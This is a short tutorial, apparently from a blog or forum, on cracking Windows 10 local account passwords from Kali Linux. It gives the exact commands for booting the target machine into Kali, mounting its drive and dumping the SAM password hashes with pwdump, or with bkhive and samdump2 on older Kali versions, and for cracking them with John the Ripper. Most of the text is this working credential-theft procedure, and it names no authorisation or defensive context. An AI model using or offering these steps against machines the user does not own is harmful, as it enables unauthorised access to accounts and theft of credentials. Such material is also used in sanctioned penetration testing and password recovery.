It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.
To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.
Restart the target Windows computer with your KALI Linux 2.0 system. From time to time when you try to access the hard drive containing the Windows partition you may receive an error message related to the Windows hibernation file. To avoid this, shutdown Windows at the command prompt with the command:
shutdown /s /t 0
This should prevent the hibernation file problem. Once you are in KALI, open up FILES and select your Windows hard drive to mount it. Open a terminal window and enter the command
mount
to determine the path to your Windows hard drive. Most of the time the Windows hard drive will be the last mount point in the list, normally something like /dev/sda1. Your path will be something like /media/root/OSDisk. Browse to your mount point/Windows/System32/config folder. Use the follwoing command to create a dump of the Windows passwords:
pwdump SYSTEM SAM > /root/Desktop/SAM2
Then use John the Ripper to break the passwords.
john /root/Desktop/SAM2 –format=NT
For Kali Linux prior to version 2.0
Open terminal
Open drive in Computer so it will mount
mount to see location of drive
change to /Windows/System32/config folder in mount point
bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
john /root/hash.txt –format=nt2